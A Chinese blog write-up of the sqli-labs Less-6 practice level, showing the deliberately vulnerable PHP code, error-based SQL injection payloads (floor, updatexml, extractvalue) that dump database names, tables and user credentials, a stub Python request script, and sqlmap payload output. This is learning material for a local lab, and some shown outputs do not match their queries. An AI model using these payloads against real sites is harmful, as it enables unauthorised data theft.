sqli-lab-less6

最新推荐文章于 2024-07-13 10:38:18 发布
最新推荐文章于 2024-07-13 10:38:18 发布
阅读量54 收藏 1
点赞数
分类专栏: sql-lab 文章标签: 网络安全 mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Sa1nZen/article/details/132055966
版权
sqli-lab-less6

一、靶标地址

Less-6 GET-Double Injection-Double Quotes-string
#字符型带双引号双注入
http://127.0.0.1/sqli/less-6/

二、漏洞探测

http://127.0.0.1/sqli/less-6/?id=1
#正常回显
#You are in...........

http://127.0.0.1/sqli/less-6/?id=1'
#正常回显

http://127.0.0.1/sqli/less-6/?id=1"
#You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1
#单引号里面的是报错的语句 "1"" LIMIT 0,1
#通过报错猜测后面的语句为 where id="$id" limit 0,1

http://127.0.0.1/sqli/less-6/?id=1" --+
#正常回显
#You are in...........
#select * from users where id="1" limit 0,1;

思路:正常回显无法爆库,须通过报错回显爆库

三、源码分析

<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);

// connectivity 
//漏洞语句部分
$id = '"'.$id.'"';  //用于连接获取的id
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font size="5" color="#FFFF00">';	
  	echo 'You are in...........';
    //正常回显无法报出内容
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	
	echo '<font size="3"  color= "#FFFF00">';
	print_r(mysql_error());
     //报错回显才可报出内容
	echo "</br></font>";	
	echo '<font color= "#0000ff" font size= 3>';	
	
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

?>

四、黑盒与白盒测试

#黑白盒直接测试
$id = '"'.$id.'"';  //用于连接获取的id
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

print_r(mysql_error());

相关函数:
floor()、updatexml()、extractvalue()
原理参照less-5

1、floor()函数报错
#获取数据库 用户 版本号
id=0" union select 1,2,3 from (select count(*),concat((select concat(version(),0x3a,0x3a,database(),0x3a,0x3a,user(),0x3a)limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

#获取表名
id=0" union select 1,2,3 from (select count(*),concat((select concat(table_name,0x3a,0x3a) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

#获取列名
id=0" union select 1,2,3 from (select count(*),concat((select concat(column_name,0x3a,0x3a) from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

#获取用户名
id=0" union select 1,2,3 from (select count(*),concat((select concat(username,0x3a,0x3a,password,0x3a,0x3a) from security.users limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a --+

2、updatexml()函数报错
#获取数据库名
id=1" and updatexml(1,concat('~',database(),'~',user(),'~',version()),1) --+
#XPATH syntax error: '~security~root@localhost~5.5.53'

#获取表名
id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0) --+
#Subquery returns more than 1 row
id=1" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),0) --+
#XPATH syntax error: '~emails'

#获取列名
id=1" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),0) --+

#获取列字段
id=1" and updatexml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),0) --+
id=1" and updatexml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),0) --+

3、extractvalue()函数报错
#获取当期数据库名
id=1" union select 1,2,extractvalue(1,concat(0x7e,(select database()))) --+
#XPATH syntax error: '~security~root@localhost~5.5.53'

#获取表名
id=1" and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+ 
#XPATH syntax error: '~emails,referers,uagents,users'

#获取列名
id=1" and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))) --+
#XPATH syntax error: '~id,username,password'

#获取列字段
id=1" and extractvalue(1,concat(0x7e,(select username from security.users limit 0,1),0x7e)) --+
id=1" and extractvalue(1,concat(0x7e,(select password from security.users limit 0,1),0x7e)) --+

五、脚本撰写

import requests

url="http://127.0.0.1/sqli/less-3/index.php?id=1"
header={
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36',
	'Accept-Language': 'en-US,en;q=0.9',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7'
}
payload=""

response=requests.get(url+payload,headers=header)
print(response.text)

六、sqlmap

sqlmap -u http://127.0.0.1/sqli/less-6/index.php?id=1

Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 3522=3522#

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1" AND (SELECT 4730 FROM(SELECT COUNT(*),CONCAT(0x71707a7671,(SELECT (ELT(4730=4730,1))),0x716a767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VNHE

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 1180 FROM (SELECT(SLEEP(5)))gUVz)-- xPrk

七、总结

正常回显无法爆库,须通过报错回显爆库
Sa1nZen
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Sqli-lab:Less-1教程
m0_72286569的博客
01-28 561
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
sqli-lab教程Less-9
Brucye
03-23 384
less-9 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 时间盲注 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select co
sqli-lab-less15
Sa1nZen的博客
08-03 111
sqli-lab-less15。
【SQLI-Lab】-Less9
xinyue9966的博客
01-27 233
Less-9 GET - Blind - Time based. - Single Quotes (基于时间的GET单引号盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payloa
sqli-lab教程Less-3
Brucye
03-23 287
less-3 sqli-lab通过各种方式(整型注入,字符注入,布尔盲注,时间盲注,堆叠注入…)爆出库表字段拿到字段值。 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查表:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:select column_name
sqli-lab-less20
Sa1nZen的博客
08-05 72
sqli-lab-less20
sqli-lab-less11
Sa1nZen的博客
08-03 103
sqli-lab-less11。
sqli-lab教程 less-11,12
xiaoyuhensuai的博客
07-08 203
查找原SQL语句:$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1"这一题我们需要使用burp suite。首先我们在username和password中随便输入一串数字或字母,如图所示:然后打开抓包,点击确认,进入repeater中对数据进行改写。对数据库进行查找:把“uname=1111”改为“uname=1111' union select 1,data
sqli-lab教程Less-7
Brucye
03-23 464
Less-7 将一句话木马写入目录中,使用中国菜刀连接,拿到shell。 1.开启写入权限 使用show variables like '%secure%'在MySQL命令行中判断 show variables like '%secure%'; 如果这里为Null就没有写入权限 2.如何修改本地写入权限 通过修改 MySQL 下的 my.ini 配置文件就可以启用权限,需要把下面这个字符串写入文件中。 secure_file_priv="/" 再次查看此参数,若参数值不为 null 则修改成功。 3
sqli-lab通关txt
07-22
在这个sqli-lab通关txt文件中,我们预计会找到一系列关于SQL注入攻击的实战教程,主要涵盖了从基础到进阶的10个不同阶段的练习。 SQL注入通常发生在Web应用中,当用户输入的数据没有被正确地过滤或转义,导致这些...
第三节 Sqli-lab环境搭建-01
09-15
Sqli-lab环境搭建-01 在本节中,我们将讨论如何搭建Sqli-lab环境,包括安装PhpStudy环境、火狐浏览器插件、Sqlmap和Sqli-Lab等工具。这些工具将帮助我们学习SQL注入漏洞检测和利用。 PhpStudy环境安装 PhpStudy是...
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-lab注入练习源码
06-25
Sqli-lab是一个专门设计用于SQL注入学习和实践的平台,它为初学者和经验丰富的安全专家提供了多种级别的练习,帮助他们了解并掌握如何防止这种攻击。 首先,我们来详细了解SQL注入的基本原理。当Web应用程序接收...
sqli-lab操作详解
07-12
本篇文章将详细讲解SQL注入漏洞以及如何在`sqli-lab`这个实践环境中进行操作。 一、SQL注入的理解 SQL注入的基本原理是利用程序对用户输入数据的不当处理,使得恶意SQL代码能够与服务器上的数据库交互。当Web应用未...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
MySQL 进阶(三)【SQL 优化】
最新发布
梦想是动物管理员
07-13 867
MySQL SQL 优化
mysql笔记1
m0_62975692的博客
07-11 344
首先查看systemctl status mysqld,如果是关闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!
如何快速将Excel定义的表结构转换为MySQL的建表语句
这家伙很懒,什么都没有留下
07-09 1163
在数据管理和数据库设计中,经常需要从Excel文件中获取表结构并快速转换为MySQL数据库的建表语句。这个过程不仅可以节省大量手动输入的时间,还能减少因人为错误导致的数据库设计问题。本文将详细介绍如何高效地完成这一过程,包括使用不同的方法和工具,以及提供实际案例和代码示例,旨在帮助初学者和技术人员快速掌握这一技能。
sqli-lab安装
09-05
要安装sqli-lab,您需要按照以下步骤进行操作: 1. 首先,确保您具有Web服务器环境。您可以使用Apache、Nginx或其他适合您的环境的Web服务器。 2. 下载sqli-lab的代码。您可以从GitHub存储库中获取它,链接:https://github.com/Audi-1/sqli-labs 。 3. 将下载的代码解压缩到您的Web服务器的根目录下。 4. 创建一个MySQL数据库,并导入提供的SQL文件。您可以在"sqli-labs/db-creds.inc"文件中找到数据库凭据。将该文件重命名为"db-creds.inc.php"并填写正确的数据库信息。 5. 现在,您应该能够通过访问"http://your-server-ip/sqli-labs/"来访问sqli-lab。 请注意,sqli-lab是一个用于学习和测试SQL注入漏洞的实验室环境。确保在安装和使用过程中采取适当的安全措施,不要将其用于非法目的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值